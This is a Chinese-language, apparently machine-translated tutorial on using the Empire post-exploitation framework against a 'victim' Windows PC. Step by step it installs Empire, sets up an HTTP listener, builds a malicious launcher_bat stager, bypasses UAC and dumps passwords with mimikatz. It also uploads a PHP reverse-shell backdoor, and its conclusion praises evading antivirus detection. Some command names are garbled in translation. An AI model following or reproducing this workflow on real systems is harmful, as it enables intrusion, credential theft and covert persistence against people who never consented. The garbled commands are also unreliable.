安裝
您可以從此處下載Empire 。從為GitHub提供的超鏈接中克隆命令,或者直接使用google。
使用以下命令下載它:
1
git clone https://github.com/EmpireProject/Empire.git
啟動並完成下載后,請按照下面直接給出的步驟進行安裝:
cd Empire/
ls
cd setup/
ls
./install.sh
等待它完成安裝。這可能需要幾秒鍾。它將提示您輸入密碼。
就我而言,我的密碼是toor。
安裝完成后,移回目錄並使用./empire運行empire 。
現在使用“ 幫助”命令,因為它打開了最初需要的所有基本選項。
根據工作流程,首先,我們必須在本地計算機上創建一個偵聽器。鍵入以下命令:
listeners
運行上面的命令后,它將說“當前沒有偵聽器處於活動狀態”,但是不用擔心,我們現在進入偵聽器界面。因此,在此偵聽器界面中,輸入:
uselistener <tab> <tab>
上面的命令將列出一個人可以使用的所有偵聽器,例如dbx,http,http_com等。最受歡迎和最常用的偵聽器是http,我們將在實踐中使用相同的偵聽器。對於該類型:
uselistener http
此命令會在本地端口80上創建一個偵聽器。如果Apache之類的服務已經在端口80上忙了,請確保停止該服務,因為此HTTP偵聽器僅在端口80上起作用。現在查看所有設置您應該提供以下偵聽器類型:
info
正如您在圖像中看到的,可以使用多種設置來修改或自定義偵聽器。讓我們嘗試更改監聽器的名稱,因為它有助於記住所有已激活的監聽器。如果批量激活。因此,請輸入:
set Name test
上面的命令會將偵聽器的名稱從http更改為test。
通常,此偵聽器會自動占用本地主機IP,但是以防萬一,您可以使用以下命令來設置IP:
set Host //192.168.1.107
execute
上面的命令將執行監聽器。然后返回並使用PowerShell監聽器,如圖所示。
現在鍵入“ back”從偵聽器界面返回,以便我們可以執行模塊。使用以下命令查看帝國提供的所有模塊:
usestager <tabt> <tab>
如下圖所示,有許多用於Windows和IOS的模塊,以及可以在任何平台上使用的多個模塊。在我們的教程中,我們將使用launcher_bat創建惡意軟件並利用受害者的PC。對於這種類型:
usestager windows/launcher_bat
然后再次鍵入“ info”以查看漏洞利用程序所需的所有設置。檢查后,您將看到我們僅需要提供偵聽器。因此,鍵入:
set Listener test
execute
設置偵聽器測試並創建/tmp/launcher.bat之后,以上兩個命令將執行我們的利用。使用python服務器在受害者的PC中執行此文件。文件執行后,您將擁有一個會話。要檢查您的會話類型:
agents
使用以上命令,您可以看到已激活會話。您可以更改會話的名稱,因為默認情況下提供的名稱非常復雜且難以記住。為此,請輸入:
rename ZAF3GT5W raajpc
使用以下內容訪問會話:
interact raajpc
獲得對會話的訪問權限后,請嘗試使用以下命令來獲取管理會話:
旁路http
執行bypassuac命令后,將打開另一個會話。通過輸入以下命令重命名該會話:
rename HE3K45LN adminraj
讓我們
interact with adminraj now.
interact adminraj
<tab> <tab>幫助我們查看Shell中的所有選項。有幾個選項對於后期開發非常有幫助。如圖所示,例如信息,工作,列表等。
信息: 有關IP,隨機數,抖動,完整性等所有基本信息。
現在,如果您使用“幫助”命令,您將能夠看到所有可執行命令。
讓我們嘗試運行 mimikatz 來獲取用戶的密碼。由於 mimikatz 不能在普通的來賓用戶shell上運行,而只能在admin shell上運行;這也證明我們必須獲得管理員訪問權限才能使用mimikatz。
嗯!用戶raj的密碼為“ 123”。
信譽
上面的命令將以明文和哈希值的形式轉儲任何用戶的憑據或密碼。
另一個重要的命令是 shell 命令。
要使用受害者的外殼運行正確的Microsoft Windows命令,我們使用此功能。
例如:一個這樣的窗口的僅cmd命令是 netstat
shell netstat -ano
正如預期的那樣,以上命令向我們顯示了機器上當前正在使用的所有端口!
現在,由於Windows中的默認shell目錄為“ C:/ windows / system32 ”;讓我們嘗試移至另一個目錄並嘗試從該目錄下載一些文件,並且我們可以在該位置上載一些內容,例如,我們可以上載后門!現在,使用以下命令:
shell cd C:\Users\raj\Desktop
shell dir
download 6.png
上面的命令將從窗口桌面將名為6.png的圖像下載到“ Empires的下載目錄”
upload /root/Desktop/revshell.php
在這里,我們可以上傳任何后門,借助上述命令,我們可以從Kali的桌面向受害人的桌面上傳php后門,並且由於我們具有shell訪問權限,因此甚至可以調用此文件!
這是下載的文件所在的位置:
帝國目錄/下載/ <代理名稱> / <代理外殼位置>
shell dir
上面的命令證明我們確實已經上傳了revshell.php
在那里!受害機器的桌面上的Revshell.php是我們的后門文件。
先前顯示的是帝國的基本演示及其使用的不同術語以及如何使用它們。也有另一個術語,即usemodule。最后,讓我們看看如何使用它。
usemodule <tab> <tab>
該命令將向您顯示所有可用並准備使用的模塊,如下圖所示:
以下是有關如何使用usemodule的小演示。類型:
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
使用以上模塊將在受害者的PC上顯示一條消息,如下圖所示:
結論
.exe / dll / hta等形式的惡意軟件使攻擊者可以構造任何期望的攻擊,因為此框架可以訪問Win32。盡管反病毒公司正日益意識到這一點,但它們仍然有效。由於其大量,真實和有效的漏洞利用后收集,它是一個很好的工具。最終,目標是在攻擊中未被發現並成功,並且此工具使我們能夠做到這一點。本文涵蓋了您需要了解的有關該框架的所有基礎知識。